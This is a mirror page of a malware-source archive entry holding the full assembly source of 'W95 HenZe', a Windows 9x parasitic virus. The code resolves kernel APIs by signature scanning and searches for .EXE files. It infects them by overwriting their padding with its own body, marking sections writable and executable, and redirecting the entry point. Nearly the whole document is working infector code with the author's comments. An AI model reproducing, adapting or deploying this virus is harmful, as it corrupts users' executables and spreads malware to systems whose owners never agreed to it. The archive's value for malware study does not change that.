mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
524 lines
12 KiB
NASM
524 lines
12 KiB
NASM
|
;---------------------------- W95 HenZe BY HenKy -----------------------------
|
||
|
;
|
||
|
;-AUTHOR: HenKy
|
||
|
;
|
||
|
;-MAIL: HenKy_@latinmail.com
|
||
|
;
|
||
|
;-ORIGIN: SPAIN
|
||
|
;
|
||
|
|
||
|
|
||
|
.586P
|
||
|
.MODEL FLAT
|
||
|
LOCALS
|
||
|
|
||
|
|
||
|
EXTRN ExitProcess:PROC
|
||
|
|
||
|
KERNEL95 EQU 0BFF70000h
|
||
|
MIX_SIZ EQU FILE_END-MEGAMIX
|
||
|
MIX_MEM EQU MEM_END-MEGAMIX
|
||
|
NABLA EQU DELTA-MEGAMIX
|
||
|
MARKA EQU 66
|
||
|
FLAGZ EQU 00000020H OR 20000000H OR 80000000H
|
||
|
MAX_PATH EQU 260
|
||
|
|
||
|
MACROSIZE MACRO
|
||
|
|
||
|
DB MIX_SIZ/01000 mod 10 + "0"
|
||
|
DB MIX_SIZ/00100 mod 10 + "0"
|
||
|
DB MIX_SIZ/00010 mod 10 + "0"
|
||
|
DB MIX_SIZ/00001 mod 10 + "0"
|
||
|
|
||
|
ENDM
|
||
|
|
||
|
; LAME W9X PARASITIC RUNTIME PADDINGX OVERWRITER
|
||
|
; INFECTED FILES WONT GROW, BUT NEED PADDINGX SERIES (USSUALLY AT RELOC SECTION)
|
||
|
|
||
|
; MOV
|
||
|
; CALL
|
||
|
; JNZ ONLY SIX OPCODES WERE USED.. xDDD
|
||
|
; ADD /
|
||
|
; SUB /
|
||
|
; CMP /
|
||
|
|
||
|
; AND NO INDEXING MODE (EASY DISASM CODE)
|
||
|
|
||
|
;MOV EAX,[EBP+5]
|
||
|
|
||
|
;TURNS INTO:
|
||
|
|
||
|
; ADD EBP,5
|
||
|
; MOV EAX,[EBP]
|
||
|
|
||
|
;AND SO...
|
||
|
|
||
|
; *INFINITE* THX TO T00FiC FOR THE REDUCED OPCODE SET IDEA AND
|
||
|
|
||
|
; SEVERAL META TIPS
|
||
|
|
||
|
.DATA
|
||
|
|
||
|
copyrisgt DB 'HenZe '
|
||
|
|
||
|
MACROSIZE
|
||
|
.CODE
|
||
|
|
||
|
; BIZARRE VIRUS BEGINS...
|
||
|
MEGAMIX:
|
||
|
|
||
|
|
||
|
MOV EAX, 401005H
|
||
|
MILO EQU $-4
|
||
|
DELTA:
|
||
|
MOV EBP,EAX
|
||
|
WINES:
|
||
|
MOV EAX,KERNEL95
|
||
|
MOV CL,'M'
|
||
|
CMP BYTE PTR [EAX],CL
|
||
|
JNZ WARNING
|
||
|
MOV EBX,EAX
|
||
|
MOV EDX,02b226A57h ; GPA SIGNATURE FOR W9X
|
||
|
|
||
|
BUSCA3:
|
||
|
ADD EAX,1
|
||
|
CMP DWORD PTR [EAX],EDX
|
||
|
JNZ SHORT BUSCA3
|
||
|
APIZ:
|
||
|
|
||
|
MOV ECX,OFFSET GPA
|
||
|
ADD ECX,EBP
|
||
|
SUB ECX,OFFSET DELTA
|
||
|
MOV [ECX],EAX
|
||
|
MOV ESI, OFFSET APIs
|
||
|
ADD ESI,EBP
|
||
|
SUB ESI,OFFSET DELTA
|
||
|
MOV EDI,OFFSET APIaddresses
|
||
|
ADD EDI,EBP
|
||
|
SUB EDI,OFFSET DELTA
|
||
|
|
||
|
GPI: SUB ESP,4
|
||
|
MOV [ESP],ESI
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EBX
|
||
|
MOV ECX,OFFSET GPA
|
||
|
ADD ECX,EBP
|
||
|
SUB ECX,OFFSET DELTA
|
||
|
CALL [ECX]
|
||
|
|
||
|
MOV [EDI],EAX
|
||
|
ADD EDI,4
|
||
|
|
||
|
|
||
|
NPI:
|
||
|
MOV AL,BYTE PTR [ESI]
|
||
|
ADD ESI,1
|
||
|
|
||
|
CMP AL,0
|
||
|
JNZ SHORT NPI
|
||
|
CMP [ESI], AL
|
||
|
JNZ GPI
|
||
|
|
||
|
|
||
|
|
||
|
INFECT:
|
||
|
|
||
|
MOV EAX, OFFSET Win32FindData
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EAX
|
||
|
MOV EAX,OFFSET IMASK
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EAX
|
||
|
MOV EAX,OFFSET FindFirstFile
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
CALL [EAX]
|
||
|
MOV EBX, OFFSET SearcHandle
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX,OFFSET DELTA
|
||
|
MOV [EBX],EAX
|
||
|
|
||
|
|
||
|
LOOPER:
|
||
|
CMP EAX,-1
|
||
|
JNZ SUPPER
|
||
|
|
||
|
|
||
|
WARNING:
|
||
|
|
||
|
MOV EAX,12345678H
|
||
|
ORG $-4
|
||
|
OLD_EIP DD 00401000H
|
||
|
ADD ESP,4
|
||
|
CALL EAX ; SUXXX!!! I DONT WANT TO WASTE JMP HERE
|
||
|
|
||
|
SUPPER:
|
||
|
|
||
|
CMP EAX,0
|
||
|
JNZ ALLKEY
|
||
|
PILLE:
|
||
|
CMP ESP,0 ; ESP NEVER IS ZERO
|
||
|
JNZ WARNING
|
||
|
|
||
|
ALLKEY:
|
||
|
|
||
|
SUB ESP,4
|
||
|
MOV EAX,OFFSET OLD_EIP
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
MOV EBX,[EAX]
|
||
|
MOV [ESP],EBX
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EDX
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],00000080h
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],3
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EDX
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EDX
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],0C0000000h
|
||
|
|
||
|
MOV EAX ,offset FNAME ; OPEN IT!
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EAX
|
||
|
MOV EAX, OFFSET CreateFile
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
CALL [EAX]
|
||
|
|
||
|
MOV EBX,OFFSET FileHandle
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX, OFFSET DELTA
|
||
|
MOV [EBX],EAX ; SAVE HNDL
|
||
|
MOV EBX,OFFSET WFD_nFileSizeLow
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX, OFFSET DELTA
|
||
|
MOV ECX, [EBX]
|
||
|
|
||
|
MOV EDX,0
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EDX
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],ECX
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EDX
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],4H
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EDX
|
||
|
|
||
|
SUB ESP,4
|
||
|
MOV EBX,OFFSET FileHandle
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX,OFFSET DELTA
|
||
|
MOV ECX,[EBX]
|
||
|
MOV [ESP],ECX
|
||
|
MOV EAX, OFFSET CreateFileMappingA
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
CALL [EAX]
|
||
|
|
||
|
MOV EBX,OFFSET MapHandle
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX, OFFSET DELTA
|
||
|
MOV [EBX],EAX
|
||
|
|
||
|
MOV EBX,OFFSET WFD_nFileSizeLow
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX, OFFSET DELTA
|
||
|
MOV ECX, [EBX]
|
||
|
|
||
|
MOV EDX,0
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],ECX
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EDX
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EDX
|
||
|
ADD EDX,2
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EDX
|
||
|
SUB ESP,4
|
||
|
MOV ECX, OFFSET MapHandle
|
||
|
ADD ECX,EBP
|
||
|
SUB ECX,OFFSET DELTA
|
||
|
MOV EBX,[ECX]
|
||
|
MOV [ESP],EBX
|
||
|
MOV EBX, OFFSET MapViewOfFile
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX,OFFSET DELTA
|
||
|
CALL [EBX]
|
||
|
|
||
|
MOV EBX,OFFSET MapAddress
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX,OFFSET DELTA
|
||
|
MOV [EBX],EAX
|
||
|
MOV ESI,EAX ; GET PE HDR
|
||
|
MOV EDX,EAX
|
||
|
ADD EAX,3CH
|
||
|
MOV ESI,[EAX]
|
||
|
ADD ESI,EDX
|
||
|
CMP BYTE PTR [ESI],"P" ; IS A 'P'E ?
|
||
|
JNZ Cerrar
|
||
|
ADD ESI,MARKA
|
||
|
CMP BYTE PTR [ESI],"H" ; HenKy IS HERE ?
|
||
|
JNZ Cerrar1
|
||
|
CMP ESP,0
|
||
|
JNZ Cerrar
|
||
|
|
||
|
Cerrar1:
|
||
|
SUB ESI,MARKA
|
||
|
MOV EBX,ESI
|
||
|
ADD EBX,3CH
|
||
|
MOV EAX,[EBX] ; ONLY SOME W98 HAVE 1000H/1000H INSTEAD 1000H/200H
|
||
|
MOV ECX,ESI
|
||
|
ADD ECX,56
|
||
|
CMP EAX,[ECX]
|
||
|
JNZ Cerrar
|
||
|
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],ESI
|
||
|
MOV ECX,0
|
||
|
MOV EDI,ESI
|
||
|
ADD EDI,6
|
||
|
MOV CL,BYTE PTR [EDI]
|
||
|
ADD EDI,74H-6
|
||
|
MOV EBX,[EDI]
|
||
|
ADD EBX,EBX
|
||
|
ADD EBX,EBX
|
||
|
ADD EBX,EBX
|
||
|
ADD ESI,78H
|
||
|
ADD ESI,EBX
|
||
|
ADD ESI,24H
|
||
|
WRI:
|
||
|
MOV DWORD PTR [ESI], 0C0000040h
|
||
|
ADD ESI,40
|
||
|
SUB ECX,1
|
||
|
CMP ECX,0
|
||
|
JNZ WRI
|
||
|
|
||
|
MOV ESI,[ESP]
|
||
|
ADD ESP,4
|
||
|
|
||
|
MOV EDI,ESI
|
||
|
ADD ESI,28H
|
||
|
MOV EAX,[ESI]
|
||
|
ADD ESI,34H-28H
|
||
|
ADD EAX,[ESI]
|
||
|
MOV ECX,[ESI]
|
||
|
MOV EDX,OFFSET BASE
|
||
|
ADD EDX,EBP
|
||
|
SUB EDX,OFFSET DELTA
|
||
|
MOV [EDX],ECX
|
||
|
MOV EBX,OFFSET OLD_EIP
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX,OFFSET DELTA
|
||
|
MOV [EBX],EAX
|
||
|
MOV ESI,EDI
|
||
|
ADD ESI,MARKA
|
||
|
MOV BYTE PTR [ESI],"H" ; HenKy!
|
||
|
MOV EAX,OFFSET WFD_nFileSizeLow
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
MOV ECX,[EAX]
|
||
|
MOV EAX,EDI
|
||
|
BU:
|
||
|
CMP DWORD PTR [EDI], 'XGNI'
|
||
|
JNZ PE
|
||
|
CMP ESP,0
|
||
|
JNZ PO
|
||
|
|
||
|
PE:
|
||
|
ADD EDI,1
|
||
|
SUB ECX,1
|
||
|
CMP ECX,0
|
||
|
JNZ BU
|
||
|
CMP ESP,0
|
||
|
JNZ Cerrar
|
||
|
|
||
|
PO:
|
||
|
MOV ESI,EDI
|
||
|
ADD ESI,4
|
||
|
CMP DWORD PTR [ESI], 'DAPX'
|
||
|
JNZ PE
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EDI
|
||
|
MOV EBX,OFFSET MapAddress
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX,OFFSET DELTA
|
||
|
SUB EDI,[EBX]
|
||
|
ADD EAX,28H
|
||
|
MOV [EAX],EDI
|
||
|
MOV EBX,OFFSET BASE
|
||
|
ADD EBX,EBP
|
||
|
SUB EBX,OFFSET DELTA
|
||
|
ADD EDI,[EBX]
|
||
|
ADD EDI,5
|
||
|
MOV EDX,OFFSET MILO
|
||
|
ADD EDX,EBP
|
||
|
SUB EDX,OFFSET DELTA
|
||
|
MOV [EDX],EDI
|
||
|
|
||
|
MOV EDI,[ESP]
|
||
|
ADD ESP,4
|
||
|
|
||
|
MOV ESI,OFFSET MEGAMIX
|
||
|
ADD ESI,EBP
|
||
|
SUB ESI,OFFSET DELTA
|
||
|
MOV ECX,MIX_SIZ/4
|
||
|
|
||
|
BASTARDO_VIRUS:
|
||
|
|
||
|
MOV EAX,[ESI]
|
||
|
MOV [EDI],EAX
|
||
|
ADD ESI,4
|
||
|
ADD EDI,4
|
||
|
SUB ECX,1
|
||
|
CMP ECX,0
|
||
|
JNZ BASTARDO_VIRUS
|
||
|
|
||
|
UnMapFile:
|
||
|
|
||
|
MOV EAX, OFFSET MapAddress
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EAX
|
||
|
MOV EAX, OFFSET UnmapViewOfFile
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
CALL [EAX]
|
||
|
|
||
|
CloseMap:
|
||
|
|
||
|
MOV EAX, OFFSET MapHandle
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EAX
|
||
|
MOV EAX, OFFSET CloseHandle
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
CALL [EAX]
|
||
|
|
||
|
|
||
|
Cerrar:
|
||
|
|
||
|
MOV EAX,OFFSET OLD_EIP
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
MOV EBX,[ESP]
|
||
|
MOV [EAX],EBX
|
||
|
ADD ESP,4
|
||
|
|
||
|
MOV EAX, OFFSET FileHandle
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EAX
|
||
|
MOV EAX, OFFSET CloseHandle
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
CALL [EAX]
|
||
|
|
||
|
|
||
|
TOPO:
|
||
|
|
||
|
|
||
|
MOV EAX, offset Win32FindData
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EAX
|
||
|
|
||
|
MOV EAX, OFFSET SearcHandle
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
SUB ESP,4
|
||
|
MOV [ESP],EAX
|
||
|
MOV EAX, OFFSET FindNextFile
|
||
|
ADD EAX,EBP
|
||
|
SUB EAX,OFFSET DELTA
|
||
|
CALL [EAX]
|
||
|
CMP ESP,0
|
||
|
JNZ LOOPER
|
||
|
|
||
|
|
||
|
APIs:
|
||
|
DB "CreateFileA",0
|
||
|
DB "CloseHandle",0
|
||
|
DB "FindFirstFileA",0
|
||
|
DB "FindNextFileA",0
|
||
|
DB "MapViewOfFile",0
|
||
|
DB "UnmapViewOfFile",0
|
||
|
DB "CreateFileMappingA",0
|
||
|
Zero_ DB 0
|
||
|
BASE DD 0
|
||
|
|
||
|
IMASK DB '*.ExE',0
|
||
|
DB 'HenZe LameVirus BY HenKy',0
|
||
|
|
||
|
align 4
|
||
|
|
||
|
FILE_END LABEL BYTE
|
||
|
|
||
|
APIaddresses:
|
||
|
|
||
|
CreateFile DD 0
|
||
|
CloseHandle DD 0
|
||
|
FindFirstFile DD 0
|
||
|
FindNextFile DD 0
|
||
|
MapViewOfFile DD 0
|
||
|
UnmapViewOfFile DD 0
|
||
|
CreateFileMappingA DD 0
|
||
|
GPA DD 0
|
||
|
SearcHandle DD 0
|
||
|
FileHandle DD 0
|
||
|
MapHandle DD 0
|
||
|
MapAddress DD 0
|
||
|
|
||
|
FILETIME STRUC
|
||
|
|
||
|
FT_dwLowDateTime DD ?
|
||
|
FT_dwHighDateTime DD ?
|
||
|
|
||
|
FILETIME ENDS
|
||
|
|
||
|
Win32FindData:
|
||
|
|
||
|
WFD_dwFileAttributes DD ?
|
||
|
WFD_ftCreationTime FILETIME ?
|
||
|
WFD_ftLastAccessTime FILETIME ?
|
||
|
WFD_ftLastWriteTime FILETIME ?
|
||
|
WFD_nFileSizeHigh DD ?
|
||
|
WFD_nFileSizeLow DD ?
|
||
|
WFD_dwReserved0 DD ?
|
||
|
WFD_dwReserved1 DD ?
|
||
|
FNAME DD 0
|
||
|
DD 0
|
||
|
DD 0
|
||
|
DD 0
|
||
|
DD 0
|
||
|
DD 0
|
||
|
align 4
|
||
|
|
||
|
|
||
|
MEM_END LABEL BYTE
|
||
|
|
||
|
EXITPROC:
|
||
|
|
||
|
PUSH 0
|
||
|
CALL ExitProcess
|
||
|
|
||
|
ENDS
|
||
|
END MEGAMIX
|